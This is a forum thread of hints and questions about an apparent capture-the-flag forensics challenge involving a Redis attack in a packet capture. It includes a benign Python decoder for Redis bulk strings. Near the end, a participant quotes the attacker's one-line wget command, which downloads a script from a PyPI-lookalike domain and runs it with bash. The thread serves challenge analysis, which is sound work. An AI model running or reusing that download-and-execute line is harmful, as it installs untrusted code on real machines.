I found two of the three parts of the flag, one of which was obfuscated in malware and the other in plain text. During the analysis, I noticed an excerpt that evidenced the attacker’s exploitation by “dumping” user accounts from the Redis database, which can be easily found in Wireshark. Despite this, I still haven’t been able to locate the last part. Could someone give me some help?
I tried recovering the hashed passwords and looking at the codes in the usernames; for now, the valid key is that there are 10 valid hashes with hashcat for the third part of the flag.
part1: 3…
part2: c…
These are my suggestions for part three. If you have any suggestions, they would be very appreciated.
It’s all enumeration and digging. You should notice some encoded text and a suspicious module. See if you’re able to reverse your current thought process and analyze that module somehow.
I’m on the same page. I tried for almost a day, 2/3 completed. Tried to get the last flag with hashcat but nothing works, maybe we are missing something… Can anyone help us? I will really appreciate it.
I’m the same, I have 2/3. Does the last one have to do with the bulk string responses? Because I can’t find any way to deserialize the Redis bulk strings.
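For anyone stuck on the bulk-string replies mentioned above, here is an added example (not code from the thread or the challenge) of a small RESP2 decoder that turns a reassembled Redis TCP stream into Python values. The sample client/server bytes are constructed for illustration; "user:alice" and "hash_placeholder" are invented, not values from the capture.

```python
# Added example: minimal Redis Serialization Protocol (RESP2) decoder for
# reviewing Redis traffic exported from a pcap. Sample bytes are constructed.

def parse_resp(buf: bytes, pos: int = 0):
    """Parse one RESP value starting at buf[pos]; return (value, next_pos)."""
    kind = buf[pos:pos + 1]
    end = buf.index(b"\r\n", pos)
    line = buf[pos + 1:end]
    nxt = end + 2
    if kind == b"+":            # simple string, e.g. "+OK\r\n"
        return line.decode(), nxt
    if kind == b"-":            # error reply, e.g. "-NOAUTH ...\r\n"
        return {"error": line.decode()}, nxt
    if kind == b":":            # integer, e.g. ":42\r\n"
        return int(line), nxt
    if kind == b"$":            # bulk string: "$<len>\r\n<len bytes>\r\n"
        length = int(line)
        if length == -1:        # "$-1\r\n" is a null bulk string (missing key)
            return None, nxt
        data = buf[nxt:nxt + length]
        return data, nxt + length + 2
    if kind == b"*":            # array: "*<count>\r\n" then <count> nested values
        count = int(line)
        if count == -1:
            return None, nxt
        items = []
        for _ in range(count):
            item, nxt = parse_resp(buf, nxt)
            items.append(item)
        return items, nxt
    raise ValueError(f"unknown RESP type byte {kind!r} at offset {pos}")

def parse_stream(buf: bytes):
    """Decode every RESP value in a reassembled TCP stream, in order."""
    values, pos = [], 0
    while pos < len(buf):
        value, pos = parse_resp(buf, pos)
        values.append(value)
    return values

# Constructed sample: a client issuing HGETALL (commands are sent as arrays of
# bulk strings) and the server's array-of-bulk-strings reply.
CLIENT = b"*2\r\n$7\r\nHGETALL\r\n$10\r\nuser:alice\r\n"
SERVER = b"*4\r\n$8\r\nusername\r\n$5\r\nalice\r\n$8\r\npassword\r\n$16\r\nhash_placeholder\r\n"

if __name__ == "__main__":
    print(parse_stream(CLIENT))   # [[b'HGETALL', b'user:alice']]
    print(parse_stream(SERVER))   # [[b'username', b'alice', b'password', b'hash_placeholder']]
```

In Wireshark, "Follow TCP Stream" with "Raw" output and "Save as" gives a file you can feed straight into parse_stream.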
Do you mean the encoded script? Downloaded with wget?
Any hints for the third flag?
Okay, so I got 2/3 flags. Got the encryption and IV keys, but I’m unable to find the ciphertext(?). Looking at the “oldmem”, but it seems to open a file? Doesn’t seem right to me. Any hints?
Anything to do with the ELF header of a packet, or do I just have to try and decrypt the message in one of the streams?
Can someone help me? I think I found the third flag but don’t know how to decode it; I think it is the output of this command:
wget --no-check-certificate -O gezsdSC8i3 'https://files.pypi-install.com/packages/gezsdSC8i3' && bash gezsdSC8i3
I figured it out, if someone needs help DM me!
Sent you a DM.